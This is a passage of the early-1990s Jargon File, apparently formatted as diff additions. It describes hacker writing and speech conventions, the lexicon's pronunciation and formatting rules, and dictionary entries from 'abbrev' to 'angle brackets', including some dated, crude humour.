+:Hacker Writing Style: +====================== + +We've already seen that hackers often coin jargon by overgeneralizing +grammatical rules. This is one aspect of a more general fondness for +form-versus-content language jokes that shows up particularly in hackish +writing. One correspondent reports that he consistently misspells +`wrong' as `worng'. Others have been known to criticize glitches in +Jargon File drafts by observing (in the mode of Douglas Hofstadter) +"This sentence no verb", or "Bad speling", or "Incorrectspa cing." +Similarly, intentional spoonerisms are often made of phrases relating to +confusion or things that are confusing; `dain bramage' for `brain +damage' is perhaps the most common (similarly, a hacker would be likely +to write "Excuse me, I'm cixelsyd today", rather than "I'm dyslexic +today"). This sort of thing is quite common and is enjoyed by all +concerned. + +Hackers tend to use quotes as balanced delimiters like parentheses, much +to the dismay of American editors. Thus, if "Jim is going" is a phrase, +and so are "Bill runs" and "Spock groks", then hackers generally prefer +to write: "Jim is going", "Bill runs", and "Spock groks". This is +incorrect according to standard American usage (which would put the +continuation commas and the final period inside the string quotes); +however, it is counter-intuitive to hackers to mutilate literal strings +with characters that don't belong in them. Given the sorts of examples +that can come up in discussions of programming, American-style quoting +can even be grossly misleading. When communicating command lines or +small pieces of code, extra characters can be a real pain in the neck. + +Consider, for example, a sentence in a {vi} tutorial that looks like this: + + Then delete a line from the file by typing "dd". + +Standard usage would make this + + Then delete a line from the file by typing "dd." + +but that would be very bad -- because the reader would be prone to type +the string d-d-dot, and it happens that in `vi(1)' dot repeats the last +command accepted. The net result would be to delete *two* lines! + +The Jargon File follows hackish usage throughout. + +Interestingly, a similar style is now preferred practice in Great +Britain, though the older style (which became established for +typographical reasons having to do with the aesthetics of comma and +quotes in typeset text) is still accepted there. `Hart's Rules' and the +`Oxford Dictionary for Writers and Editors' call the hacker-like style +`new' or `logical' quoting. + +Another hacker quirk is a tendency to distinguish between `scare' quotes +and `speech' quotes; that is, to use British-style single quotes for +marking and reserve American-style double quotes for actual reports of +speech or text included from elsewhere. Interestingly, some authorities +describe this as correct general usage, but mainstream American English +has gone to using double-quotes indiscriminately enough that hacker +usage appears marked [and, in fact, I thought this was a personal quirk +of mine until I checked with USENET --- ESR]. One further permutation +that is definitely *not* standard is a hackish tendency to do marking +quotes by using apostrophes (single quotes) in pairs; that is, 'like +this'. This is modelled on string and character literal syntax in some +programming languages (reinforced by the fact that many character-only +terminals display the apostrophe in typewriter style, as a vertical +single quote). + +One quirk that shows up frequently in the {email} style of UNIX hackers +in particular is a tendency for some things that are normally +all-lowercase (including usernames and the names of commands and C +routines) to remain uncapitalized even when they occur at the beginning +of sentences. It is clear that, for many hackers, the case of such +identifiers becomes a part of their internal representation (the +`spelling') and cannot be overridden without mental effort (an +appropriate reflex because UNIX and C both distinguish cases and +confusing them can lead to {lossage}). A way of escaping this dilemma +is simply to avoid using these constructions at the beginning of +sentences. + +There seems to be a meta-rule behind these nonstandard hackerisms to the +effect that precision of expression is more important than conformance +to traditional rules; where the latter create ambiguity or lose +information they can be discarded without a second thought. It is +notable in this respect that other hackish inventions (for example, in +vocabulary) also tend to carry very precise shades of meaning even when +constructed to appear slangy and loose. In fact, to a hacker, the +contrast between `loose' form and `tight' content in jargon is a +substantial part of its humor! + +Hackers have also developed a number of punctuation and emphasis +conventions adapted to single-font all-ASCII communications links, and +these are occasionally carried over into written documents even when +normal means of font changes, underlining, and the like are available. + +One of these is that TEXT IN ALL CAPS IS INTERPRETED AS `LOUD', and this +becomes such an ingrained synesthetic reflex that a person who goes to +caps-lock while in {talk mode} may be asked to "stop shouting, please, +you're hurting my ears!". + +Also, it is common to use bracketing with unusual characters to signify +emphasis. The asterisk is most common, as in "What the *hell*?" even +though this interferes with the common use of the asterisk suffix as a +footnote mark. The underscore is also common, suggesting underlining +(this is particularly common with book titles; for example, "It is often +alleged that Joe Haldeman wrote _The_Forever_War_ as a rebuttal to +Robert Heinlein's earlier novel of the future military, +_Starship_Troopers_."). Other forms exemplified by "=hell=", "\hell/", +or "/hell/" are occasionally seen (it's claimed that in the last example +the first slash pushes the letters over to the right to make them +italic, and the second keeps them from falling over). Finally, words +may also be emphasized L I K E T H I S, or by a series of carets (^) +under them on the next line of the text. + +There is a semantic difference between *emphasis like this* (which +emphasizes the phrase as a whole), and *emphasis* *like* *this* (which +suggests the writer speaking very slowly and distinctly, as if to a +very young child or a mentally impaired person). Bracketing a word with +the `*' character may also indicate that the writer wishes readers to +consider that an action is taking place or that a sound is being made. +Examples: *bang*, *hic*, *ring*, *grin*, *kick*, *stomp*, *mumble*. + +There is also an accepted convention for `writing under erasure'; the +text + + Be nice to this fool^H^H^H^Hgentleman, he's in from corporate HQ. + +would be read as "Be nice to this fool, I mean this gentleman...". This +comes from the fact that the digraph ^H is often used as a print +representation for a backspace. It parallels (and may have been +influenced by) the ironic use of `slashouts' in science-fiction +fanzines. + +In a formula, `*' signifies multiplication but two asterisks in a row +are a shorthand for exponentiation (this derives from FORTRAN). Thus, +one might write 2 ** 8 = 256. + +Another notation for exponentiation one sees more frequently uses the +caret (^, ASCII 1011110); one might write instead `2^8 = 256'. This +goes all the way back to Algol-60, which used the archaic ASCII +`up-arrow' that later became the caret; this was picked up by Kemeny and +Kurtz's original BASIC, which in turn influenced the design of the +`bc(1)' and `dc(1)' UNIX tools, which have probably done most to +reinforce the convention on USENET. The notation is mildly confusing to +C programmers, because `^' means bitwise {XOR} in C. Despite this, it +was favored 3:1 over ** in a late-1990 snapshot of USENET. It is used +consistently in this text. + +In on-line exchanges, hackers tend to use decimal forms or improper +fractions (`3.5' or `7/2') rather than `typewriter style' mixed +fractions (`3-1/2'). The major motive here is probably that the former +are more readable in a monospaced font, together with a desire to avoid +the risk that the latter might be read as `three minus one-half'. The +decimal form is definitely preferred for fractions with a terminating +decimal representation; there may be some cultural influence here from +the high status of scientific notation. + +Another on-line convention, used especially for very large or very small +numbers, is taken from C (which derived it from FORTRAN). This is a +form of `scientific notation' using `e' to replace `*10^'; for example, +one year is about 3e7 seconds long. + +The tilde (~) is commonly used in a quantifying sense of +`approximately'; that is, `~50' means `about fifty'. + +On USENET and in the {MUD} world, common C boolean, logical, and +relational operators such as `|', `&', `||', `&&', `!', `==', `!=', `>', +and `<', `>=', and `=<' are often combined with English. The Pascal +not-equals, `<>', is also recognized, and occasionally one sees `/=' for +not-equals (from Ada, Common Lisp, and Fortran 90). The use of prefix +`!' as a loose synonym for `not-' or `no-' is particularly common; thus, +`!clue' is read `no-clue' or `clueless'. + +A related practice borrows syntax from preferred programming languages +to express ideas in a natural-language text. For example, one might +see the following: + + I resently had occasion to field-test the Snafu + Systems 2300E adaptive gonkulator. The price was + right, and the racing stripe on the case looked kind + of neat, but its performance left something to be + desired. + + #ifdef FLAME + Hasn't anyone told those idiots that you can't get + decent bogon suppression with AFJ filters at today's + net speeds? + #endif /* FLAME */ + + I guess they figured the price premium for true + frame-based semantic analysis was too high. + Unfortunately, it's also the only workable approach. + I wouldn't recommend purchase of this product unless + you're on a *very* tight budget. + + #include + -- + == Frank Foonly (Fubarco Systems) + +In the above, the `#ifdef'/`#endif' pair is a conditional +compilation syntax from C; here, it implies that the text between +(which is a {flame}) should be evaluated only if you have turned on +(or defined on) the switch FLAME. The `#include' at the end is C +for "include standard disclaimer here"; the `standard disclaimer' is +understood to read, roughly, "These are my personal opinions and not +to be construed as the official position of my employer." + +Another habit is that of using angle-bracket enclosure to genericize a +term; this derives from conventions used in {BNF}. Uses like the +following are common: + + So this walks into a bar one day, and... + +Hackers also mix letters and numbers more freely than in mainstream +usage. In particular, it is good hackish style to write a digit +sequence where you intend the reader to understand the text string that +names that number in English. So, hackers prefer to write `1970s' +rather than `nineteen-seventies' or `1970's' (the latter looks like a +possessive). + +It should also be noted that hackers exhibit much less reluctance to use +multiply nested parentheses than is normal in English. Part of this is +almost certainly due to influence from LISP (which uses deeply nested +parentheses (like this (see?)) in its syntax a lot), but it has also +been suggested that a more basic hacker trait of enjoying playing with +complexity and pushing systems to their limits is in operation. + +One area where hackish conventions for on-line writing are still in some +flux is the marking of included material from earlier messages --- what +would be called `block quotations' in ordinary English. From the usual +typographic convention employed for these (smaller font at an extra +indent), there derived the notation of included text being indented by +one ASCII TAB (0001001) character, which under UNIX and many other +environments gives the appearance of an 8-space indent. + +Early mail and netnews readers had no facility for including messages +this way, so people had to paste in copy manually. BSD `Mail(1)' was +the first message agent to support inclusion, and early USENETters +emulated its style. But the TAB character tended to push included text +too far to the right (especially in multiply nested inclusions), leading +to ugly wraparounds. After a brief period of confusion (during which an +inclusion leader consisting of three or four spaces became established +in EMACS and a few mailers), the use of leading `>' or `> ' became +standard, perhaps owing to its use in `ed(1)' to display tabs +(alternatively, it may derive from the `>' that some early UNIX mailers +used to quote lines starting with "From" in text, so they wouldn't look +like the beginnings of new message headers). Inclusions within +inclusions keep their `>' leaders, so the `nesting level' of a quotation +is visually apparent. + +A few other idiosyncratic quoting styles survive because they are +automatically generated. One particularly ugly one looks like this: + + /* Written hh:mm pm Mmm dd, yyyy by user@site in */ + /* ---------- "Article subject, chopped to 35 ch" ---------- */ + + /* End of text from local:group */ + +It is generated by an elderly, variant news-reading system called +`notesfiles'. The overall trend, however, is definitely away from such +verbosity. + +The practice of including text from the parent article when posting a +followup helped solve what had been a major nuisance on USENET: the fact +that articles do not arrive at different sites in the same order. +Careless posters used to post articles that would begin with, or even +consist entirely of, "No, that's wrong" or "I agree" or the like. It +was hard to see who was responding to what. Consequently, around 1984, +new news-posting software evolved a facility to automatically include +the text of a previous article, marked with "> " or whatever the poster +chose. The poster was expected to delete all but the relevant lines. +The result has been that, now, careless posters post articles containing +the *entire* text of a preceding article, *followed* only by "No, that's +wrong" or "I agree". + +Many people feel that this cure is worse than the original disease, and +there soon appeared newsreader software designed to let the reader skip +over included text if desired. Today, some posting software rejects +articles containing too high a proportion of lines beginning with `>' -- +but this too has led to undesirable workarounds, such as the deliberate +inclusion of zero-content filler lines which aren't quoted and thus pull +the message below the rejection threshold. + +Because the default mailers supplied with UNIX and other operating +systems haven't evolved as quickly as human usage, the older conventions +using a leading TAB or three or four spaces are still alive; however, +>-inclusion is now clearly the prevalent form in both netnews and mail. + +In 1991 practice is still evolving, and disputes over the `correct' +inclusion style occasionally lead to {holy wars}. One variant style +reported uses the citation character `|' in place of `>' for extended +quotations where original variations in indentation are being retained. +One also sees different styles of quoting a number of authors in the +same message: one (deprecated because it loses information) uses a +leader of `> ' for everyone, another (the most common) is `> > > > ', `> +> > ', etc. (or `>>>> ', `>>> ', etc., depending on line length and +nesting depth) reflecting the original order of messages, and yet +another is to use a different citation leader for each author, say `> ', +`: ', `| ', `} ' (preserving nesting so that the inclusion order of +messages is still apparent, or tagging the inclusions with authors' +names). Yet *another* style is to use each poster's initials (or login +name) as a citation leader for that poster. Occasionally one sees a `# +' leader used for quotations from authoritative sources such as +standards documents; the intended allusion is to the root prompt (the +special UNIX command prompt issued when one is running as the privileged +super-user). + +Finally, it is worth mentioning that many studies of on-line +communication have shown that electronic links have a de-inhibiting +effect on people. Deprived of the body-language cues through which +emotional state is expressed, people tend to forget everything about +other parties except what is presented over that ASCII link. This has +both good and bad effects. The good one is that it encourages honesty +and tends to break down hierarchical authority relationships; the bad is +that it may encourage depersonalization and gratuitous rudeness. +Perhaps in response to this, experienced netters often display a sort of +conscious formal politesse in their writing that has passed out of +fashion in other spoken and written media (for example, the phrase "Well +said, sir!" is not uncommon). + +Many introverted hackers who are next to inarticulate in person +communicate with considerable fluency over the net, perhaps precisely +because they can forget on an unconscious level that they are dealing +with people and thus don't feel stressed and anxious as they would face +to face. + +Though it is considered gauche to publicly criticize posters for poor +spelling or grammar, the network places a premium on literacy and +clarity of expression. It may well be that future historians of +literature will see in it a revival of the great tradition of personal +letters as art. + +:Hacker Speech Style: +===================== + +Hackish speech generally features extremely precise diction, careful +word choice, a relatively large working vocabulary, and relatively +little use of contractions or street slang. Dry humor, irony, puns, and +a mildly flippant attitude are highly valued --- but an underlying +seriousness and intelligence are essential. One should use just enough +jargon to communicate precisely and identify oneself as a member of the +culture; overuse of jargon or a breathless, excessively gung-ho attitude +is considered tacky and the mark of a loser. + +This speech style is a variety of the precisionist English normally +spoken by scientists, design engineers, and academics in technical +fields. In contrast with the methods of jargon construction, it is +fairly constant throughout hackerdom. + +It has been observed that many hackers are confused by negative +questions --- or, at least, that the people to whom they are talking are +often confused by the sense of their answers. The problem is that they +have done so much programming that distinguishes between + + if (going) { + +and + + if (!going) { + +that when they parse the question "Aren't you going?" it seems to be +asking the opposite question from "Are you going?", and so merits an +answer in the opposite sense. This confuses English-speaking +non-hackers because they were taught to answer as though the negative +part weren't there. In some other languages (including Russian, +Chinese, and Japanese) the hackish interpretation is standard and the +problem wouldn't arise. Hackers often find themselves wishing for a +word like French `si' or German `doch' with which one could +unambiguously answer `yes' to a negative question. + +For similar reasons, English-speaking hackers almost never use double +negatives, even if they live in a region where colloquial usage allows +them. The thought of uttering something that logically ought to be an +affirmative knowing it will be misparsed as a negative tends to disturb +them. + +Here's a related quirk. A non-hacker who is indelicate enough to ask +a question like "So, are you working on finding that bug *now* +or leaving it until later?" is likely to get the perfectly correct +answer "Yes!" (that is, "Yes, I'm doing it either now or later, and +you didn't ask which!"). + +:International Style: +===================== + +Although the Jargon File remains primarily a lexicon of hacker usage in +American English, we have made some effort to get input from abroad. +Though the hacker-speak of other languages often uses translations of +jargon from English (often as transmitted to them by earlier Jargon File +versions!), the local variations are interesting, and knowledge of them +may be of some use to travelling hackers. + +There are some references herein to `Commonwealth English'. These are +intended to describe some variations in hacker usage as reported in the +English spoken in Great Britain and the Commonwealth (Canada, Australia, +India, etc. --- though Canada is heavily influenced by American usage). +There is also an entry on {{Commonwealth Hackish}} reporting some +general phonetic and vocabulary differences from U.S. hackish. + +Hackers in Western Europe and (especially) Scandinavia are reported to +often use a mixture of English and their native languages for technical +conversation. Occasionally they develop idioms in their English usage +that are influenced by their native-language styles. Some of these are +reported here. + +A few notes on hackish usages in Russian have been added where they are +parallel with English idioms and thus comprehensible to +English-speakers. + +:How to Use the Lexicon: +************************ + +:Pronunciation Guide: +===================== + +Pronunciation keys are provided in the jargon listings for all entries +that are neither dictionary words pronounced as in standard English nor +obvious compounds thereof. Slashes bracket phonetic pronunciations, +which are to be interpreted using the following conventions: + + 1. Syllables are hyphen-separated, except that an accent or back-accent + follows each accented syllable (the back-accent marks a secondary + accent in some words of four or more syllables). + + 2. Consonants are pronounced as in American English. The letter `g' is + always hard (as in "got" rather than "giant"); `ch' is soft + ("church" rather than "chemist"). The letter `j' is the sound + that occurs twice in "judge". The letter `s' is always as in + "pass", never a z sound. The digraph `kh' is the guttural of + "loch" or "l'chaim". + + 3. Uppercase letters are pronounced as their English letter names; thus + (for example) /H-L-L/ is equivalent to /aitch el el/. /Z/ may + be pronounced /zee/ or /zed/ depending on your local dialect. + + 4. Vowels are represented as follows: + + a + back, that + ar + far, mark + aw + flaw, caught + ay + bake, rain + e + less, men + ee + easy, ski + eir + their, software + i + trip, hit + i: + life, sky + o + father, palm + oh + flow, sew + oo + loot, through + or + more, door + ow + out, how + oy + boy, coin + uh + but, some + u + put, foot + y + yet, young + yoo + few, chew + [y]oo + /oo/ with optional fronting as in `news' (/nooz/ or /nyooz/) + +A /*/ is used for the `schwa' sound of unstressed or occluded vowels +(the one that is often written with an upside-down `e'). The schwa +vowel is omitted in syllables containing vocalic r, l, m or n; that is, +`kitten' and `color' would be rendered /kit'n/ and /kuhl'r/, not +/kit'*n/ and /kuhl'*r/. + +Entries with a pronunciation of `//' are written-only usages. (No, UNIX +weenies, this does *not* mean `pronounce like previous pronunciation'!) + +:Other Lexicon Conventions: +=========================== + +Entries are sorted in case-blind ASCII collation order (rather than the +letter-by-letter order ignoring interword spacing common in mainstream +dictionaries), except that all entries beginning with nonalphabetic +characters are sorted after Z. The case-blindness is a feature, not a +bug. + +The beginning of each entry is marked by a colon (`:') at the +left margin. This convention helps out tools like hypertext browsers +that benefit from knowing where entry boundaries are, but aren't as +context-sensitive as humans. + +In pure ASCII renderings of the Jargon File, you will see {} used to +bracket words which themselves have entries in the File. This isn't +done all the time for every such word, but it is done everywhere that a +reminder seems useful that the term has a jargon meaning and one might +wish to refer to its entry. + +In this all-ASCII version, headwords for topic entries are distinguished +from those for ordinary entries by being followed by "::" rather than +":"; similarly, references are surrounded by "{{" and "}}" rather than +"{" and "}". + +Defining instances of terms and phrases appear in `slanted type'. A +defining instance is one which occurs near to or as part of an +explanation of it. + +Prefix * is used as linguists do; to mark examples of incorrect usage. + +We follow the `logical' quoting convention described in the Writing +Style section above. In addition, we reserve double quotes for actual +excerpts of text or (sometimes invented) speech. Scare quotes (which +mark a word being used in a nonstandard way), and philosopher's quotes +(which turn an utterance into the string of letters or words that name +it) are both rendered with single quotes. + +References such as `malloc(3)' and `patch(1)' are to UNIX facilities +(some of which, such as `patch(1)', are actually freeware distributed +over USENET). The UNIX manuals use `foo(n)' to refer to item foo in +section (n) of the manual, where n=1 is utilities, n=2 is system calls, +n=3 is C library routines, n=6 is games, and n=8 (where present) is +system administration utilities. Sections 4, 5, and 7 of the manuals +have changed roles frequently and in any case are not referred to in any +of the entries. + +Various abbreviations used frequently in the lexicon are summarized here: + +abbrev. + abbreviation +adj. + adjective +adv. + adverb +alt. + alternate +cav. + caveat +esp. + especially +excl. + exclamation +imp. + imperative +interj. + interjection +n. + noun +obs. + obsolete +pl. + plural +poss. + possibly +pref. + prefix +prob. + probably +prov. + proverbial +quant. + quantifier +suff. + suffix +syn. + synonym (or synonymous with) +v. + verb (may be transitive or intransitive) +var. + variant +vi. + intransitive verb +vt. + transitive verb + +Where alternate spellings or pronunciations are given, alt. +separates two possibilities with nearly equal distribution, while +var. prefixes one that is markedly less common than the primary. + +Where a term can be attributed to a particular subculture or is known +to have originated there, we have tried to so indicate. Here is a +list of abbreviations used in etymologies: + +Berkeley + University of California at Berkeley +Cambridge + the university in England (*not* the city in Massachusetts where + MIT happens to be located!) +BBN + Bolt, Beranek & Newman +CMU + Carnegie-Mellon University +Commodore + Commodore Business Machines +DEC + The Digital Equipment Corporation +Fairchild + The Fairchild Instruments Palo Alto development group +Fidonet + See the {Fidonet} entry +IBM + International Business Machines +MIT + Massachusetts Institute of Technology; esp. the legendary MIT AI Lab + culture of roughly 1971 to 1983 and its feeder groups, including the + Tech Model Railroad Club +NRL + Naval Research Laboratories +NYU + New York University +OED + The Oxford English Dictionary +Purdue + Purdue University +SAIL + Stanford Artificial Intelligence Laboratory (at Stanford + University) +SI + From Syst`eme International, the name for the standard + conventions of metric nomenclature used in the sciences +Stanford + Stanford University +Sun + Sun Microsystems +TMRC + Some MITisms go back as far as the Tech Model Railroad Club (TMRC) at + MIT c. 1960. Material marked TMRC is from `An Abridged Dictionary + of the TMRC Language', originally compiled by Pete Samson in 1959 +UCLA + University of California at Los Angeles +UK + the United Kingdom (England, Wales, Scotland, Northern Ireland) +USENET + See the {USENET} entry +WPI + Worcester Polytechnic Institute, site of a very active community of + PDP-10 hackers during the 1970s +XEROX PARC + XEROX's Palo Alto Research Center, site of much pioneering research in + user interface design and networking +Yale + Yale University + + +Some other etymology abbreviations such as {UNIX} and {PDP-10} +refer to technical cultures surrounding specific operating systems, +processors, or other environments. The fact that a term is labelled +with any one of these abbreviations does not necessarily mean its use +is confined to that culture. In particular, many terms labelled `MIT' +and `Stanford' are in quite general use. We have tried to give some +indication of the distribution of speakers in the usage notes; +however, a number of factors mentioned in the introduction conspire to +make these indications less definite than might be desirable. + +A few new definitions attached to entries are marked [proposed]. +These are usually generalizations suggested by editors or USENET +respondents in the process of commenting on previous definitions of +those entries. These are *not* represented as established +jargon. + +:Format For New Entries: +======================== + +All contributions and suggestions about the Jargon File will be +considered donations to be placed in the public domain as part of this +File, and may be used in subsequent paper editions. Submissions may +be edited for accuracy, clarity and concision. + +Try to conform to the format already being used --- head-words +separated from text by a colon (double colon for topic entries), +cross-references in curly brackets (doubled for topic entries), +pronunciations in slashes, etymologies in square brackets, +single-space after definition numbers and word classes, etc. Stick to +the standard ASCII character set (7-bit printable, no high-half +characters or [nt]roff/TeX/Scribe escapes), as one of the versions +generated from the master file is an info document that has to be +viewable on a character tty. + +We are looking to expand the file's range of technical specialties covered. +There are doubtless rich veins of jargon yet untapped in the scientific +computing, graphics, and networking hacker communities; also in numerical +analysis, computer architectures and VLSI design, language design, and many +other related fields. Send us your jargon! + +We are *not* interested in straight technical terms explained by +textbooks or technical dictionaries unless an entry illuminates +`underground' meanings or aspects not covered by official histories. +We are also not interested in `joke' entries --- there is a lot of +humor in the file but it must flow naturally out of the explanations +of what hackers do and how they think. + +It is OK to submit items of jargon you have originated if they have spread +to the point of being used by people who are not personally acquainted with +you. We prefer items to be attested by independent submission from two +different sites. + +The Jargon File will be regularly maintained and re-posted from now on +and will include a version number. Read it, pass it around, +contribute --- this is *your* monument! + +The Jargon Lexicon +****************** + += A = +===== + +:abbrev: /*-breev'/, /*-brev'/ n. Common abbreviation for + `abbreviation'. + +:ABEND: [ABnormal END] /ah'bend/, /*-bend'/ n. Abnormal + termination (of software); {crash}; {lossage}. Derives from an + error message on the IBM 360; used jokingly by hackers but + seriously mainly by {code grinder}s. Usually capitalized, but may + appear as `abend'. Hackers will try to persuade you that ABEND is + called `abend' because it is what system operators do to the + machine late on Friday when they want to call it a day, and hence + is from the German `Abend' = `Evening'. + +:accumulator: n. 1. Archaic term for a register. On-line use of it + as a synonym for `register' is a fairly reliable indication that + the user has been around for quite a while and/or that the + architecture under discussion is quite old. The term in full is + almost never used of microprocessor registers, for example, though + symbolic names for arithmetic registers beginning in `A' derive + from historical use of the term `accumulator' (and not, actually, + from `arithmetic'). Confusingly, though, an `A' register name + prefix may also stand for `address', as for example on the + Motorola 680x0 family. 2. A register being used for arithmetic or + logic (as opposed to addressing or a loop index), especially one + being used to accumulate a sum or count of many items. This use is + in context of a particular routine or stretch of code. "The + FOOBAZ routine uses A3 as an accumulator." 3. One's in-basket + (esp. among old-timers who might use sense 1). "You want this + reviewed? Sure, just put it in the accumulator." (See {stack}.) + +:ACK: /ak/ interj. 1. [from the ASCII mnemonic for 0000110] + Acknowledge. Used to register one's presence (compare mainstream + *Yo!*). An appropriate response to {ping} or {ENQ}. + 2. [from the comic strip "Bloom County"] An exclamation of + surprised disgust, esp. in "Ack pffft!" Semi-humorous. + Generally this sense is not spelled in caps (ACK) and is + distinguished by a following exclamation point. 3. Used to + politely interrupt someone to tell them you understand their point + (see {NAK}). Thus, for example, you might cut off an overly + long explanation with "Ack. Ack. Ack. I get it now". + + There is also a usage "ACK?" (from sense 1) meaning "Are you + there?", often used in email when earlier mail has produced no + reply, or during a lull in {talk mode} to see if the person has + gone away (the standard humorous response is of course {NAK} + (sense 2), i.e., "I'm not here"). + +:ad-hockery: /ad-hok'*r-ee/ [Purdue] n. 1. Gratuitous assumptions + made inside certain programs, esp. expert systems, which lead to + the appearance of semi-intelligent behavior but are in fact + entirely arbitrary. For example, fuzzy-matching input tokens that + might be typing errors against a symbol table can make it look as + though a program knows how to spell. 2. Special-case code to cope + with some awkward input that would otherwise cause a program to + {choke}, presuming normal inputs are dealt with in some cleaner + and more regular way. Also called `ad-hackery', `ad-hocity' + (/ad-hos'*-tee/), `ad-crockery'. See also {ELIZA effect}. + +:Ada:: n. A {{Pascal}}-descended language that has been made + mandatory for Department of Defense software projects by the + Pentagon. Hackers are nearly unanimous in observing that, + technically, it is precisely what one might expect given that kind + of endorsement by fiat; designed by committee, crockish, difficult + to use, and overall a disastrous, multi-billion-dollar boondoggle + (one common description is "The PL/I of the 1980s"). Hackers + find Ada's exception-handling and inter-process communication + features particularly hilarious. Ada Lovelace (the daughter of + Lord Byron who became the world's first programmer while + cooperating with Charles Babbage on the design of his mechanical + computing engines in the mid-1800s) would almost certainly blanch + at the use to which her name has latterly been put; the kindest + thing that has been said about it is that there is probably a good + small language screaming to get out from inside its vast, + {elephantine} bulk. + +:adger: /aj'r/ [UCLA] vt. To make a bonehead move with consequences + that could have been foreseen with a slight amount of mental + effort. E.g., "He started removing files and promptly adgered the + whole project". Compare {dumbass attack}. + +:admin: /ad-min'/ n. Short for `administrator'; very commonly + used in speech or on-line to refer to the systems person in charge + on a computer. Common constructions on this include `sysadmin' + and `site admin' (emphasizing the administrator's role as a site + contact for email and news) or `newsadmin' (focusing specifically + on news). Compare {postmaster}, {sysop}, {system + mangler}. + +:ADVENT: /ad'vent/ n. The prototypical computer adventure game, first + implemented on the {PDP-10} by Will Crowther as an attempt at + computer-refereed fantasy gaming, and expanded into a + puzzle-oriented game by Don Woods. Now better known as Adventure, + but the {{TOPS-10}} operating system permitted only 6-letter + filenames. See also {vadding}. + + This game defined the terse, dryly humorous style now expected in + text adventure games, and popularized several tag lines that have + become fixtures of hacker-speak: "A huge green fierce snake bars + the way!" "I see no X here" (for some noun X). "You are in a + maze of twisty little passages, all alike." "You are in a little + maze of twisty passages, all different." The `magic words' + {xyzzy} and {plugh} also derive from this game. + + Crowther, by the way, participated in the exploration of the + Mammoth & Flint Ridge cave system; it actually *has* a + `Colossal Cave' and a `Bedquilt' as in the game, and the `Y2' that + also turns up is cavers' jargon for a map reference to a secondary + entrance. + +:AFJ: n. Written-only abbreviation for "April Fool's Joke". + Elaborate April Fool's hoaxes are a hallowed tradition on USENET + and Internet; see {kremvax} for an example. In fact, April + Fool's Day is the *only* seasonal holiday marked by customary + observances on the hacker networks. + +:AI-complete: /A-I k*m-pleet'/ [MIT, Stanford: by analogy with + `NP-complete' (see {NP-})] adj. Used to describe problems or + subproblems in AI, to indicate that the solution presupposes a + solution to the `strong AI problem' (that is, the synthesis of a + human-level intelligence). A problem that is AI-complete is, in + other words, just too hard. + + Examples of AI-complete problems are `The Vision Problem' + (building a system that can see as well as a human) and `The + Natural Language Problem' (building a system that can understand + and speak a natural language as well as a human). These may appear + to be modular, but all attempts so far (1991) to solve them have + foundered on the amount of context information and `intelligence' + they seem to require. See also {gedanken}. + +:AI koans: /A-I koh'anz/ pl.n. A series of pastiches of Zen + teaching riddles created by Danny Hillis at the MIT AI Lab around + various major figures of the Lab's culture (several are included + under "{A Selection of AI Koans}" in {appendix + A}). See also {ha ha only serious}, {mu}, and {{Humor, + Hacker}}. + +:AIDS: /aydz/ n. Short for A* Infected Disk Syndrome (`A*' is a + {glob} pattern that matches, but is not limited to, Apple), + this condition is quite often the result of practicing unsafe + {SEX}. See {virus}, {worm}, {Trojan horse}, + {virgin}. + +:AIDX: n. /aydkz/ n. Derogatory term for IBM's perverted version + of UNIX, AIX, especially for the AIX 3.? used in the IBM RS/6000 + series. A victim of the dreaded "hybridism" disease, this + attempt to combine the two main currents of the UNIX stream + ({BSD} and {USG UNIX}) became a {monstrosity} to haunt + system administrators' dreams. For example, if new accounts are + created while many users are logged on, the load average jumps + quickly over 20 due to silly implementation of the user databases. + For a quite similar disease, compare {HP-SUX}. Also, compare + {terminak}, {Macintrash} {Nominal Semidestructor}, + {Open DeathTrap}, {ScumOS}, {sun-stools}. + +:airplane rule: n. "Complexity increases the possibility of + failure; a twin-engine airplane has twice as many engine problems + as a single-engine airplane." By analogy, in both software and + electronics, the rule that simplicity increases robustness (see + also {KISS Principle}). It is correspondingly argued that the + right way to build reliable systems is to put all your eggs in one + basket, after making sure that you've built a really *good* + basket. + +:aliasing bug: n. A class of subtle programming errors that can + arise in code that does dynamic allocation, esp. via + `malloc(3)' or equivalent. If more than one pointer addresses + (`aliases for') a given hunk of storage, it may happen that the + storage is freed or reallocated (and thus moved) through one alias + and then referenced through another, which may lead to subtle (and + possibly intermittent) lossage depending on the state and the + allocation history of the malloc {arena}. Avoidable by use of + allocation strategies that never alias allocated core. Also + avoidable by use of higher-level languages, such as {LISP}, + which employ a garbage collector (see {GC}). Also called a + {stale pointer bug}. See also {precedence lossage}, + {smash the stack}, {fandango on core}, {memory leak}, + {memory smash}, {overrun screw}, {spam}. + + Historical note: Though this term is nowadays associated with + C programming, it was already in use in a very similar sense in the + Algol-60 and FORTRAN communities in the 1960s. + +:all-elbows: adj. Of a TSR (terminate-and-stay-resident) IBM PC + program, such as the N pop-up calendar and calculator utilities + that circulate on {BBS} systems: unsociable. Used to describe a + program that rudely steals the resources that it needs without + considering that other TSRs may also be resident. One particularly + common form of rudeness is lock-up due to programs fighting over + the keyboard interrupt. See {rude}, also {mess-dos}. + +:alpha particles: n. See {bit rot}. + +:alt: /awlt/ 1. n. The alt shift key on an IBM PC or {clone}. + 2. n. The `clover' or `Command' key on a Macintosh; use of this + term usually reveals that the speaker hacked PCs before coming to + the Mac (see also {feature key}). Some Mac hackers, + confusingly, reserve `alt' for the Option key. 3. n.obs. [PDP-10; + often capitalized to ALT] Alternate name for the ASCII + ESC character (ASCII 0011011), after the keycap labeling on some + older terminals. Also `altmode' (/awlt'mohd/). This character + was almost never pronounced `escape' on an ITS system, in + {TECO}, or under TOPS-10 --- always alt, as in "Type alt alt to + end a TECO command" or "alt-U onto the system" (for "log onto + the [ITS] system"). This was probably because alt is more + convenient to say than `escape', especially when followed by + another alt or a character (or another alt *and* a character, + for that matter). + +:alt bit: /awlt bit/ [from alternate] adj. See {meta bit}. + +:altmode: n. Syn. {alt} sense 3. + +:Aluminum Book: [MIT] n. `Common LISP: The Language', by + Guy L. Steele Jr. (Digital Press, first edition 1984, second + edition 1990). Note that due to a technical screwup some printings + of the second edition are actually of a color the author describes + succinctly as "yucky green". See also {{book titles}}. + +:amoeba: n. Humorous term for the Commodore Amiga personal computer. + +:amp off: [Purdue] vt. To run in {background}. From the UNIX shell `&' + operator. + +:amper: n. Common abbreviation for the name of the ampersand (`&', + ASCII 0100110) character. See {{ASCII}} for other synonyms. + +:angle brackets: n. Either of the characters `<' (ASCII + 0111100) and `>' (ASCII 0111110) (ASCII less-than or + greater-than signs). The {Real World} angle brackets used 